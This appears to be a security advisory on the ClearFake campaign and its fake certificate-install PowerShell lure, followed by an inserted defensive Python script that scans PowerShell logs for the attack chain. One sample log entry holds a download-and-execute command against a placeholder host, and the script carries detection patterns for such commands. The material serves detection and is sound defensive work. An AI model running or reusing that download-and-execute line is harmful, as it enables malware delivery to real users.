ClearFake uses a technique called EtherHiding, which stores a malicious script in smart contracts on Binance's Smart Chain. This script is injected into compromised websites and loads a second script once a user visits. The secondary script triggers a fake overlay warning claiming that a root certificate needs to be installed for the website to display correctly, and includes instructions on how to copy and execute a PowerShell script as the purported fix. If the PowerShell script is executed, the following actions take place:
- Flushes the DNS cache.
- Clears clipboard content to remove traces of the malicious script.
- Runs a second PowerShell script that downloads Lumma Stealer.
- Lumma Stealer downloads three additional payloads:
  - Amadey Loader
  - XMRig cryptocurrency miner
  - Clipboard Hijacker
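As an added defender-side example (not part of this advisory), the following Python script scans constructed PowerShell Script Block Logging (Event ID 4104) entries for the co-occurrence of the behaviours listed above and pulls out any download URL for triage. The specific command forms it matches (ipconfig /flushdns, Clear-DnsClientCache, Set-Clipboard, iex with iwr) and the sample events are assumptions about how such a script might be written, not indicators taken from this page.

```python
import re

# Constructed sample PowerShell Script Block Logging (Event ID 4104) entries.
# The URL and script text are placeholders, not indicators from the advisory.
SAMPLE_EVENTS = [
    {"id": 101, "script": "Get-ChildItem C:\\Users | Measure-Object"},
    {"id": 102, "script": "ipconfig /flushdns; Set-Clipboard -Value ''; "
                          "iex (iwr 'http://placeholder.invalid/s.ps1' -UseBasicParsing).Content"},
    {"id": 103, "script": "Clear-DnsClientCache"},
]

# Assumed command forms for each behaviour in the chain (DNS cache flush,
# clipboard wipe, download-and-execute). Tune these to local telemetry.
INDICATORS = {
    "dns_flush": re.compile(r"ipconfig\s+/flushdns|Clear-DnsClientCache", re.I),
    "clipboard_clear": re.compile(
        r"Set-Clipboard\s+(?:-Value\s+)?(?:['\"]{2}|\$null)"
        r"|\[Windows\.Forms\.Clipboard\]::Clear\(\)", re.I),
    "download_exec": re.compile(
        r"\b(?:iex|Invoke-Expression)\b.*\b(?:iwr|Invoke-WebRequest|irm|Invoke-RestMethod|DownloadString)\b"
        r"|\b(?:iwr|Invoke-WebRequest|irm|Invoke-RestMethod|DownloadString)\b.*\b(?:iex|Invoke-Expression)\b",
        re.I | re.S),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def matched_behaviours(script_text):
    """Return the names of chain behaviours present in one script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_text)]


def extract_urls(script_text):
    """Pull any URLs out of a script block so they can be blocked or investigated."""
    return URL_RE.findall(script_text)


def find_suspicious(events, min_hits=2):
    """Flag events where at least min_hits behaviours co-occur in one block.
    A lone DNS flush is routine admin activity; the combination is not."""
    findings = []
    for ev in events:
        hits = matched_behaviours(ev["script"])
        if len(hits) >= min_hits:
            findings.append({"id": ev["id"], "hits": hits,
                             "urls": extract_urls(ev["script"])})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"event {f['id']}: {', '.join(f['hits'])}; urls={f['urls']}")
```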

- Avoid clicking links and opening attachments in unsolicited emails.
- Confirm requests from senders via contact information obtained from verified and official sources.
- Type official website URLs into browsers manually.
- Facilitate user awareness training to include these types of phishing-based techniques.
- Maintain robust and up-to-date endpoint detection tools on every endpoint.
- Consider leveraging behavior-based detection tools rather than signature-based tools.
- Phishing and other malicious cyber activity can be reported to the FBI's IC3 and the NJCCIC.
